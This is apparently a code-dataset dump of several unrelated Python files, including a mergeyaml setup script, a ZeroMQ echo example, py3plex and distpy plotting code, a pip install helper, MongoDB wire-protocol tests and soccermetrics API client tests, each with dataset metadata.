have this attribute. # Imported late to avoid cyclic import Create a link or a new field. Root of a NeXus file. # As an oversight in the NeXus standard and the reference implementation, # the NX_class was never set to NXroot. This applies to essentially all # files in existence before 2016, and files written by other implementations # that were inspired by the reference implementation. We thus hardcode NXroot: Entry in a NeXus file. Group of instrument-related information. Group of transformations. # Return underlying (h5py) group | 2.320209 | 2 |
setup.py | erkolson/mergeyaml | 0 | 6623859 | from setuptools import setup
from meta import __version__
setup(
name='mergeyaml',
version=__version__,
author="<NAME>",
py_modules=['mergeyaml'],
license="MIT",
install_requires=[
"click==6.7",
"PyYAML==3.12",
"oyaml>=0.4",
],
entry_points='''
[console_scripts]
mergeyaml=mergeyaml:cli
''',
)
| from setuptools import setup
from meta import __version__
setup(
name='mergeyaml',
version=__version__,
author="<NAME>",
py_modules=['mergeyaml'],
license="MIT",
install_requires=[
"click==6.7",
"PyYAML==3.12",
"oyaml>=0.4",
],
entry_points='''
[console_scripts]
mergeyaml=mergeyaml:cli
''',
)
| en | 0.521803 | [console_scripts] mergeyaml=mergeyaml:cli | 1.139949 | 1 |
example/zmq_echo.py | tejeez/suo | 2 | 6623860 | <reponame>tejeez/suo<gh_stars>1-10
#!/usr/bin/env python3
# Example to parse frame metadata and transmit the same data back
# with an incremented timestamp.
import zmq, threading, struct
ctx = zmq.Context()
rx = ctx.socket(zmq.SUB)
rx.connect("tcp://localhost:43300")
rx.setsockopt(zmq.SUBSCRIBE, b"")
tx = ctx.socket(zmq.PUB)
tx.connect("tcp://localhost:43301")
def hard_decision(data):
return bytes([ v >= 0x80 for v in data ])
while True:
rxframe = rx.recv()
metadata = struct.unpack('IIQIffffffffffI', rxframe[0:64])
rx_data = rxframe[64:]
rx_timestamp = metadata[2]
#print(rx_timestamp, rx_data)
tx_data = hard_decision(rx_data[12:484])
tx_timestamp = rx_timestamp + 10000000000
#print(tx_timestamp, tx_data)
print(tx_timestamp, ' '.join(['o1'[tx_data[i]] + 'o1'[tx_data[i+1]] for i in range(0, len(tx_data), 2)]))
tx.send(struct.pack('IIQIffffffffffI', 0, 4, tx_timestamp, 0, 0,0,0,0, 0,0,0,0,0,0, len(tx_data)) + tx_data)
| #!/usr/bin/env python3
# Example to parse frame metadata and transmit the same data back
# with an incremented timestamp.
import zmq, threading, struct
ctx = zmq.Context()
rx = ctx.socket(zmq.SUB)
rx.connect("tcp://localhost:43300")
rx.setsockopt(zmq.SUBSCRIBE, b"")
tx = ctx.socket(zmq.PUB)
tx.connect("tcp://localhost:43301")
def hard_decision(data):
return bytes([ v >= 0x80 for v in data ])
while True:
rxframe = rx.recv()
metadata = struct.unpack('IIQIffffffffffI', rxframe[0:64])
rx_data = rxframe[64:]
rx_timestamp = metadata[2]
#print(rx_timestamp, rx_data)
tx_data = hard_decision(rx_data[12:484])
tx_timestamp = rx_timestamp + 10000000000
#print(tx_timestamp, tx_data)
print(tx_timestamp, ' '.join(['o1'[tx_data[i]] + 'o1'[tx_data[i+1]] for i in range(0, len(tx_data), 2)]))
tx.send(struct.pack('IIQIffffffffffI', 0, 4, tx_timestamp, 0, 0,0,0,0, 0,0,0,0,0,0, len(tx_data)) + tx_data) | en | 0.351737 | #!/usr/bin/env python3 # Example to parse frame metadata and transmit the same data back # with an incremented timestamp. #print(rx_timestamp, rx_data) #print(tx_timestamp, tx_data) | 2.396214 | 2 |
examples/example_multiplex_dynamics.py | SkBlaz/supertest | 79 | 6623861 | # visualize multiplex network dynamics
from py3plex.visualization.multilayer import draw_multilayer_default
from py3plex.core import multinet
from collections import defaultdict
import matplotlib.pyplot as plt
import seaborn as sns
# first parse the layer n1 n2 w edgelist
multilayer_network = multinet.multi_layer_network().load_network(
"../multilayer_datasets/MLKing/MLKing2013_multiplex.edges",
directed=True,
input_type="multiplex_edges")
# map layer ids to names
multilayer_network.load_layer_name_mapping(
"../multilayer_datasets/MLKing/MLKing2013_layers.txt")
# Finally, load termporal edge information
multilayer_network.load_network_activity(
"../multilayer_datasets/MLKing/MLKing2013_activity.txt")
# read correctly?
multilayer_network.basic_stats()
layout_parameters = {"iterations": 1}
# internally split to layers
multilayer_network.split_to_layers(style="diagonal",
compute_layouts="force",
layout_parameters=layout_parameters,
multiplex=True)
# remove all internal networks' edges.
multilayer_network.remove_layer_edges(
) # empty graphs are stored as self.empty_layers
# do the time series splits
n = 1000 # chunk row size
partial_slices = [
multilayer_network.activity[i:i + n]
for i in range(0, multilayer_network.activity.shape[0], n)
]
num_edges = defaultdict(list)
for enx, time_slice in enumerate(partial_slices):
if enx < 12:
plt.subplot(4, 3, enx + 1)
plt.title("Time slice: {}".format(enx + 1))
num_edges_int = dict()
for enx, row in time_slice.iterrows():
real_name = multilayer_network.real_layer_names[int(row.layer_name)
- 1]
if real_name not in num_edges_int:
num_edges_int[real_name] = 1
else:
num_edges_int[real_name] += 1
for k, v in num_edges_int.items():
num_edges[k].append(v)
multilayer_network.fill_tmp_with_edges(time_slice)
draw_multilayer_default(multilayer_network.tmp_layers,
labels=multilayer_network.real_layer_names,
display=False,
background_shape="circle",
axis=None,
remove_isolated_nodes=True,
node_size=0.1,
edge_size=0.01)
multilayer_network.remove_layer_edges() # clean the slice edges
plt.show()
# plt.savefig("../images/temporal.png",dpi=300)
sns.set_style("whitegrid")
clx = {"RT": "red", "MT": "green", "RE": "blue"}
plt.subplot(1, 1, 1)
plt.title("Temporal edge dynamics")
slices = []
for k, v in num_edges.items():
sns.lineplot(list(range(len(v))), v, label=k, color=clx[k])
plt.legend()
plt.xlabel("Time slice")
plt.ylabel("Number of edges")
plt.show()
| # visualize multiplex network dynamics
from py3plex.visualization.multilayer import draw_multilayer_default
from py3plex.core import multinet
from collections import defaultdict
import matplotlib.pyplot as plt
import seaborn as sns
# first parse the layer n1 n2 w edgelist
multilayer_network = multinet.multi_layer_network().load_network(
"../multilayer_datasets/MLKing/MLKing2013_multiplex.edges",
directed=True,
input_type="multiplex_edges")
# map layer ids to names
multilayer_network.load_layer_name_mapping(
"../multilayer_datasets/MLKing/MLKing2013_layers.txt")
# Finally, load termporal edge information
multilayer_network.load_network_activity(
"../multilayer_datasets/MLKing/MLKing2013_activity.txt")
# read correctly?
multilayer_network.basic_stats()
layout_parameters = {"iterations": 1}
# internally split to layers
multilayer_network.split_to_layers(style="diagonal",
compute_layouts="force",
layout_parameters=layout_parameters,
multiplex=True)
# remove all internal networks' edges.
multilayer_network.remove_layer_edges(
) # empty graphs are stored as self.empty_layers
# do the time series splits
n = 1000 # chunk row size
partial_slices = [
multilayer_network.activity[i:i + n]
for i in range(0, multilayer_network.activity.shape[0], n)
]
num_edges = defaultdict(list)
for enx, time_slice in enumerate(partial_slices):
if enx < 12:
plt.subplot(4, 3, enx + 1)
plt.title("Time slice: {}".format(enx + 1))
num_edges_int = dict()
for enx, row in time_slice.iterrows():
real_name = multilayer_network.real_layer_names[int(row.layer_name)
- 1]
if real_name not in num_edges_int:
num_edges_int[real_name] = 1
else:
num_edges_int[real_name] += 1
for k, v in num_edges_int.items():
num_edges[k].append(v)
multilayer_network.fill_tmp_with_edges(time_slice)
draw_multilayer_default(multilayer_network.tmp_layers,
labels=multilayer_network.real_layer_names,
display=False,
background_shape="circle",
axis=None,
remove_isolated_nodes=True,
node_size=0.1,
edge_size=0.01)
multilayer_network.remove_layer_edges() # clean the slice edges
plt.show()
# plt.savefig("../images/temporal.png",dpi=300)
sns.set_style("whitegrid")
clx = {"RT": "red", "MT": "green", "RE": "blue"}
plt.subplot(1, 1, 1)
plt.title("Temporal edge dynamics")
slices = []
for k, v in num_edges.items():
sns.lineplot(list(range(len(v))), v, label=k, color=clx[k])
plt.legend()
plt.xlabel("Time slice")
plt.ylabel("Number of edges")
plt.show()
| en | 0.553372 | # visualize multiplex network dynamics # first parse the layer n1 n2 w edgelist # map layer ids to names # Finally, load termporal edge information # read correctly? # internally split to layers # remove all internal networks' edges. # empty graphs are stored as self.empty_layers # do the time series splits # chunk row size # clean the slice edges # plt.savefig("../images/temporal.png",dpi=300) | 2.747354 | 3 |
distpy/workers/plotgenerator.py | billmcchesney1/distpy | 23 | 6623862 | # (C) 2020, Schlumberger. Refer to LICENSE
import numpy
import matplotlib.pyplot as plt
import datetime
import scipy.signal
import os
import distpy.io_help.io_helpers as io_helpers
import distpy.io_help.directory_services as directory_services
import distpy.calc.extra_numpy as extra_numpy
import distpy.calc.extra_pyplot as extra_pyplot
import distpy.calc.unit_handler as unit_handler
import distpy.calc.pub_command_set as pub_command_set
import distpy.calc.processing_commands as processing_commands
'''
read_zones : read a CSV file containing measured_depth zone information
for plot annotation
'''
def read_zones(csvFile):
lines = directory_services.csv_reader(csvFile)
#conversion = 1.0
#if (lines[1][0]=="ft"):
# conversion = FT_TO_M
zones=[]
for a in range(2, len(lines),2):
one_zone={}
tokens = lines[a]
one_zone['start'] = float(tokens[0])
one_zone['name'] = tokens[-1]
tokens = lines[a+1]
one_zone['end'] = float(tokens[0])
zones.append(one_zone)
print(len(zones))
return zones
'''
plotgenerator : generates a command_list which is then executed to generate the
plots.
'''
def plotgenerator(dirin, dirout, plotData):
# Configure the hardware
boxsize = plotData.get('BOXSIZE', 500)
extra_numpy.set_boxsize(boxsize)
depth_display_unit = plotData['depth_display_unit']
start_of_fibre = plotData['start_of_fibre']
end_of_fibre = plotData['end_of_fibre']
figure_size = plotData['figure_size']
dots_per_inch = plotData['dpi']
event_list = plotData['label_list']
## clusters and stages
segs_blob = plotData['well_segments']
# blob locations
TIME_REF_BLOB = directory_services.path_join(dirin,plotData['time_reference'])
DEPTH_REF_BLOB = directory_services.path_join(dirin,plotData['depth_reference'])
time_ref = directory_services.load(TIME_REF_BLOB)
time_list = extra_pyplot.time_stamps(time_ref)
nt = time_ref.shape[0]
depth_ref = directory_services.load(DEPTH_REF_BLOB)
if (depth_display_unit=="ft"):
depth_ref = unit_handler.M_TO_FT(depth_ref)
nx = depth_ref.shape[0]
# well segmentation for flow allocations
well_segs = read_zones(segs_blob)
# same command factory as for strain-rate processing - giving maths functions...
#dir_suffix = plotData.get('directory_out',dirout)
#if not dir_suffix=='NONE':
# dirval = os.path.join(dirout,dir_suffix)
dirval = dirout
directory_services.makedir(dirval)
plt.switch_backend('Agg')
command_list = []
# small 2D array for a command zero
data=numpy.zeros((10,10),dtype=numpy.double)
command_list.append(pub_command_set.DataLoadCommand(data,{}))
for plot in plotData['plots']:
# Locally package the global information for the generation of this particular plot
plot['nx']=nx
plot['nt']=nt
plot['label_list']= plotData['label_list']
plot['time_ref']=time_ref
plot['depth_ref']=depth_ref
plot['directory_in']=dirin
plot['depth_display_unit'] = plotData['depth_display_unit']
plot['start_of_fibre'] = plotData['start_of_fibre']
plot['end_of_fibre'] = plotData['end_of_fibre']
plot['figure_size'] = plotData['figure_size']
plot['dpi'] = plotData['dpi']
plot['well_segments'] = well_segs
# internal mapping to the commands
# 1. commands have names
# 2. in_uid from a previous command (here always command zero)
plot['name'] = plot['plot_type']
plot['in_uid']=0
plot['directory_out']=dirval
command_list.append(processing_commands.CommandFactory(command_list,plot))
# Actual plot generation occurs here...
for command in command_list:
print(command)
command.execute()
| # (C) 2020, Schlumberger. Refer to LICENSE
import numpy
import matplotlib.pyplot as plt
import datetime
import scipy.signal
import os
import distpy.io_help.io_helpers as io_helpers
import distpy.io_help.directory_services as directory_services
import distpy.calc.extra_numpy as extra_numpy
import distpy.calc.extra_pyplot as extra_pyplot
import distpy.calc.unit_handler as unit_handler
import distpy.calc.pub_command_set as pub_command_set
import distpy.calc.processing_commands as processing_commands
'''
read_zones : read a CSV file containing measured_depth zone information
for plot annotation
'''
def read_zones(csvFile):
lines = directory_services.csv_reader(csvFile)
#conversion = 1.0
#if (lines[1][0]=="ft"):
# conversion = FT_TO_M
zones=[]
for a in range(2, len(lines),2):
one_zone={}
tokens = lines[a]
one_zone['start'] = float(tokens[0])
one_zone['name'] = tokens[-1]
tokens = lines[a+1]
one_zone['end'] = float(tokens[0])
zones.append(one_zone)
print(len(zones))
return zones
'''
plotgenerator : generates a command_list which is then executed to generate the
plots.
'''
def plotgenerator(dirin, dirout, plotData):
# Configure the hardware
boxsize = plotData.get('BOXSIZE', 500)
extra_numpy.set_boxsize(boxsize)
depth_display_unit = plotData['depth_display_unit']
start_of_fibre = plotData['start_of_fibre']
end_of_fibre = plotData['end_of_fibre']
figure_size = plotData['figure_size']
dots_per_inch = plotData['dpi']
event_list = plotData['label_list']
## clusters and stages
segs_blob = plotData['well_segments']
# blob locations
TIME_REF_BLOB = directory_services.path_join(dirin,plotData['time_reference'])
DEPTH_REF_BLOB = directory_services.path_join(dirin,plotData['depth_reference'])
time_ref = directory_services.load(TIME_REF_BLOB)
time_list = extra_pyplot.time_stamps(time_ref)
nt = time_ref.shape[0]
depth_ref = directory_services.load(DEPTH_REF_BLOB)
if (depth_display_unit=="ft"):
depth_ref = unit_handler.M_TO_FT(depth_ref)
nx = depth_ref.shape[0]
# well segmentation for flow allocations
well_segs = read_zones(segs_blob)
# same command factory as for strain-rate processing - giving maths functions...
#dir_suffix = plotData.get('directory_out',dirout)
#if not dir_suffix=='NONE':
# dirval = os.path.join(dirout,dir_suffix)
dirval = dirout
directory_services.makedir(dirval)
plt.switch_backend('Agg')
command_list = []
# small 2D array for a command zero
data=numpy.zeros((10,10),dtype=numpy.double)
command_list.append(pub_command_set.DataLoadCommand(data,{}))
for plot in plotData['plots']:
# Locally package the global information for the generation of this particular plot
plot['nx']=nx
plot['nt']=nt
plot['label_list']= plotData['label_list']
plot['time_ref']=time_ref
plot['depth_ref']=depth_ref
plot['directory_in']=dirin
plot['depth_display_unit'] = plotData['depth_display_unit']
plot['start_of_fibre'] = plotData['start_of_fibre']
plot['end_of_fibre'] = plotData['end_of_fibre']
plot['figure_size'] = plotData['figure_size']
plot['dpi'] = plotData['dpi']
plot['well_segments'] = well_segs
# internal mapping to the commands
# 1. commands have names
# 2. in_uid from a previous command (here always command zero)
plot['name'] = plot['plot_type']
plot['in_uid']=0
plot['directory_out']=dirval
command_list.append(processing_commands.CommandFactory(command_list,plot))
# Actual plot generation occurs here...
for command in command_list:
print(command)
command.execute()
| en | 0.740487 | # (C) 2020, Schlumberger. Refer to LICENSE read_zones : read a CSV file containing measured_depth zone information for plot annotation #conversion = 1.0 #if (lines[1][0]=="ft"): # conversion = FT_TO_M plotgenerator : generates a command_list which is then executed to generate the plots. # Configure the hardware ## clusters and stages # blob locations # well segmentation for flow allocations # same command factory as for strain-rate processing - giving maths functions... #dir_suffix = plotData.get('directory_out',dirout) #if not dir_suffix=='NONE': # dirval = os.path.join(dirout,dir_suffix) # small 2D array for a command zero # Locally package the global information for the generation of this particular plot # internal mapping to the commands # 1. commands have names # 2. in_uid from a previous command (here always command zero) # Actual plot generation occurs here... | 2.381347 | 2 |
0 install.py | MateP/ocijeni | 0 | 6623863 | #!/usr/bin/env python3
import sys, subprocess, traceback
import tkinter as tk
from tkinter import messagebox
try:
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-U', 'pip'])
for package in ['img2pdf', 'openpyxl']:
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-U', package])
root = tk.Tk()
root.withdraw()
messagebox.showinfo('Uspjeh!', 'Instalacija je uspješno privedena kraju.')
root.destroy()
except Exception as e:
root = tk.Tk()
root.withdraw()
with open('error_log.txt','w') as f:
f.write(f'{e}\n'+''.join(traceback.format_tb(e.__traceback__)))
messagebox.showerror('Kritična greška!', f'Instalacija nije dovršena do kraja.\n\nError: {e}')
root.destroy()
raise e
# Treba imati instaliran Python3 s opcijom ADD TO PATH!
| #!/usr/bin/env python3
import sys, subprocess, traceback
import tkinter as tk
from tkinter import messagebox
try:
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-U', 'pip'])
for package in ['img2pdf', 'openpyxl']:
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-U', package])
root = tk.Tk()
root.withdraw()
messagebox.showinfo('Uspjeh!', 'Instalacija je uspješno privedena kraju.')
root.destroy()
except Exception as e:
root = tk.Tk()
root.withdraw()
with open('error_log.txt','w') as f:
f.write(f'{e}\n'+''.join(traceback.format_tb(e.__traceback__)))
messagebox.showerror('Kritična greška!', f'Instalacija nije dovršena do kraja.\n\nError: {e}')
root.destroy()
raise e
# Treba imati instaliran Python3 s opcijom ADD TO PATH!
| sr | 0.208439 | #!/usr/bin/env python3 # Treba imati instaliran Python3 s opcijom ADD TO PATH! | 2.271868 | 2 |
test/test_wire.py | SamP20/mongo-sio | 0 | 6623864 | import pytest
import mongo_sio
from mongo_sio import parse_header, parse_op_msg, parse_op_reply, OP_COMPRESSED, OP_MSG, COMPRESSOR_ZLIB, COMPRESSOR_NOOP, COMPRESSOR_SNAPPY
import zlib
import struct
import bson
samples = [
bytes([8, 0, 0, 0, 1, 2, 3, 4]),
bytes([9, 0, 0, 0, 5, 6, 7, 8, 9]),
bytes([12, 0, 0, 0, 10, 11, 12, 13, 14, 15, 16, 17]),
bytes([6, 0, 0, 0, 18, 19])
]
@pytest.mark.parametrize("data",[range(256), 128])
@pytest.mark.parametrize("compressor", mongo_sio.SUPPORTED_COMPRESSORS)
def test_compressed_header_zlib(data, compressor):
body = bytes(data)
if compressor == COMPRESSOR_ZLIB:
body_compressed = zlib.compress(body)
elif compressor == COMPRESSOR_SNAPPY:
# pylint: disable=import-error
import snappy
body_compressed = snappy.compress(body)
elif compressor == COMPRESSOR_NOOP:
body_compressed = body
packed = struct.pack(f"<IIIIIB{len(body_compressed)}s",
345,
567,
OP_COMPRESSED,
OP_MSG,
len(body),
compressor,
body_compressed
)
request_id, response_to, op_code, parsed_data, offset = parse_header(packed)
assert request_id == 345
assert response_to == 567
assert op_code == OP_MSG
assert parsed_data[offset:] == body
def test_parse_op_msg():
header_doc = {
"insert": "test",
"$db": "mydb",
"writeConcern": {"w": "majority" }
}
header_bytes = bson.dumps(header_doc)
body0_ident = b"documents\x00"
body0_doc = {"_id": "Document#1", "myvar": 42}
body0_bytes = bson.dumps(body0_doc)
flagbits = 0x02.to_bytes(4, byteorder="little", signed=False) #MoreToCome bit
bodysize = (len(body0_ident) + len(body0_bytes) + 4).to_bytes(4, byteorder="little", signed=False)
packet = flagbits + b"\x00" + header_bytes + b"\x01" + bodysize + body0_ident + body0_bytes
out_flagbits, out_header_doc, out_sections = parse_op_msg(packet)
assert header_doc == out_header_doc
assert {b"documents": [body0_doc]} == out_sections
assert out_flagbits == 0x02
def test_parse_op_reply():
document = {
"A": "b",
"B": 42,
"C": {"hello": False}
}
flags = 0x55aaff00
cursor_id = 0x7799aabb_ccddeeff
starting_from = 0x11223344
num_returned = 1
doc_bytes = bson.dumps(document)
data = struct.pack(f"<iqii{len(doc_bytes)}s", flags, cursor_id, starting_from, num_returned, doc_bytes)
out_flags, out_cursor_id, out_starting_from, out_docs = parse_op_reply(data)
assert out_flags == flags
assert out_cursor_id == cursor_id
assert out_starting_from == starting_from
assert len(out_docs) == 1
assert out_docs[0] == document
| import pytest
import mongo_sio
from mongo_sio import parse_header, parse_op_msg, parse_op_reply, OP_COMPRESSED, OP_MSG, COMPRESSOR_ZLIB, COMPRESSOR_NOOP, COMPRESSOR_SNAPPY
import zlib
import struct
import bson
samples = [
bytes([8, 0, 0, 0, 1, 2, 3, 4]),
bytes([9, 0, 0, 0, 5, 6, 7, 8, 9]),
bytes([12, 0, 0, 0, 10, 11, 12, 13, 14, 15, 16, 17]),
bytes([6, 0, 0, 0, 18, 19])
]
@pytest.mark.parametrize("data",[range(256), 128])
@pytest.mark.parametrize("compressor", mongo_sio.SUPPORTED_COMPRESSORS)
def test_compressed_header_zlib(data, compressor):
body = bytes(data)
if compressor == COMPRESSOR_ZLIB:
body_compressed = zlib.compress(body)
elif compressor == COMPRESSOR_SNAPPY:
# pylint: disable=import-error
import snappy
body_compressed = snappy.compress(body)
elif compressor == COMPRESSOR_NOOP:
body_compressed = body
packed = struct.pack(f"<IIIIIB{len(body_compressed)}s",
345,
567,
OP_COMPRESSED,
OP_MSG,
len(body),
compressor,
body_compressed
)
request_id, response_to, op_code, parsed_data, offset = parse_header(packed)
assert request_id == 345
assert response_to == 567
assert op_code == OP_MSG
assert parsed_data[offset:] == body
def test_parse_op_msg():
header_doc = {
"insert": "test",
"$db": "mydb",
"writeConcern": {"w": "majority" }
}
header_bytes = bson.dumps(header_doc)
body0_ident = b"documents\x00"
body0_doc = {"_id": "Document#1", "myvar": 42}
body0_bytes = bson.dumps(body0_doc)
flagbits = 0x02.to_bytes(4, byteorder="little", signed=False) #MoreToCome bit
bodysize = (len(body0_ident) + len(body0_bytes) + 4).to_bytes(4, byteorder="little", signed=False)
packet = flagbits + b"\x00" + header_bytes + b"\x01" + bodysize + body0_ident + body0_bytes
out_flagbits, out_header_doc, out_sections = parse_op_msg(packet)
assert header_doc == out_header_doc
assert {b"documents": [body0_doc]} == out_sections
assert out_flagbits == 0x02
def test_parse_op_reply():
document = {
"A": "b",
"B": 42,
"C": {"hello": False}
}
flags = 0x55aaff00
cursor_id = 0x7799aabb_ccddeeff
starting_from = 0x11223344
num_returned = 1
doc_bytes = bson.dumps(document)
data = struct.pack(f"<iqii{len(doc_bytes)}s", flags, cursor_id, starting_from, num_returned, doc_bytes)
out_flags, out_cursor_id, out_starting_from, out_docs = parse_op_reply(data)
assert out_flags == flags
assert out_cursor_id == cursor_id
assert out_starting_from == starting_from
assert len(out_docs) == 1
assert out_docs[0] == document
| en | 0.617448 | # pylint: disable=import-error #1", "myvar": 42} #MoreToCome bit | 2.01296 | 2 |
tests/test_endpoints_canonical.py | soccermetrics/soccermetrics-client-py | 43 | 6623865 | import unittest
import mock
from soccermetrics.rest import SoccermetricsRestClient
@mock.patch('soccermetrics.rest.resources.base.EasyDict')
@mock.patch('soccermetrics.rest.resources.base.Response')
@mock.patch('soccermetrics.rest.resources.base.requests')
class ClientCanonicalEndpointTest(unittest.TestCase):
"""
Test canonical endpoints of API resources in client.
"""
def setUp(self):
self.client = SoccermetricsRestClient(base_uri="https://foo.uri", account="ID", api_key="KEY")
def create_patch(self, name):
patcher = mock.patch(name)
thing = patcher.start()
self.addCleanup(patcher.stop)
return thing
def test_validation_endpoints_integer_id_get(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Validation resources with integer UIDs passed to GET."""
mock_resp.get.return_value.status_code = 200
value = self.client.validation.phases.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/phases/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.groupRounds.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/grouprounds/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.knockoutRounds.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/knockoutrounds/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.confederations.get(10)
mock_resp.get.assert_called_with('https://foo.uri/v1/confederations/10',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.seasons.get(200)
mock_resp.get.assert_called_with('https://foo.uri/v1/seasons/200',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.timezones.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/timezones/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.nameOrder.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/name_order/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.positions.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/positions/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.fouls.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/fouls/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.cards.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/cards/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.bodyparts.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/bodyparts/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.shotevents.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/shotevents/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.penaltyOutcomes.get(2)
mock_resp.get.assert_called_with('https://foo.uri/v1/penalty_outcomes/2',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.actions.get(200)
mock_resp.get.assert_called_with('https://foo.uri/v1/actions/200',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.modifiers.get(200)
mock_resp.get.assert_called_with('https://foo.uri/v1/modifiers/200',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.modifierCategories.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/modifier_categories/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.weather.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/weather/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.surfaces.get(20)
mock_resp.get.assert_called_with('https://foo.uri/v1/surfaces/20',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_validation_endpoints_uuid_get(self, mock_resp, resp_obj, mock_dict):
"""Verify URI of Validation resources with UUIDs passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "420aa27ce815499c85ec0301aff61ec4"
value = self.client.validation.countries.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/countries/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.competitions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/competitions/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.domesticCompetitions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/domestic_competitions/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.intlCompetitions.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/intl_competitions/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.teams.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/teams/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.venues.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/venues/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.validation.persons.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/persons/420aa27ce815499c85ec0301aff61ec4',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_personnel_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify personnel resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.players.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/personnel/players/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.managers.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/personnel/managers/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.referees.get(uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/personnel/referees/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
def test_club_match_endpoints_canonical_get(self, mock_resp, resp_obj, mock_dict):
"""Verify club match resource endpoints with ID passed to GET."""
mock_resp.get.return_value.status_code = 200
match = "420aa27ce815499c85ec0301aff61ec4"
uid = "807f2a61bcea4a1bb98d66fface88b44"
value = self.client.club.information.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/info',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.conditions.get(match)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/conditions',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.lineups.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/lineups/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.goals.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/goals/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.penalties.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/penalties/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.offenses.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/offenses/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.substitutions.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/substitutions/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
value = self.client.club.shootouts.get(match, uid)
mock_resp.get.assert_called_with(
'https://foo.uri/v1/clubs/matches/420aa27ce815499c85ec0301aff61ec4/shootouts/807f2a61bcea4a1bb98d66fface88b44',
params={'app_id': 'ID', 'app_key': 'KEY'})
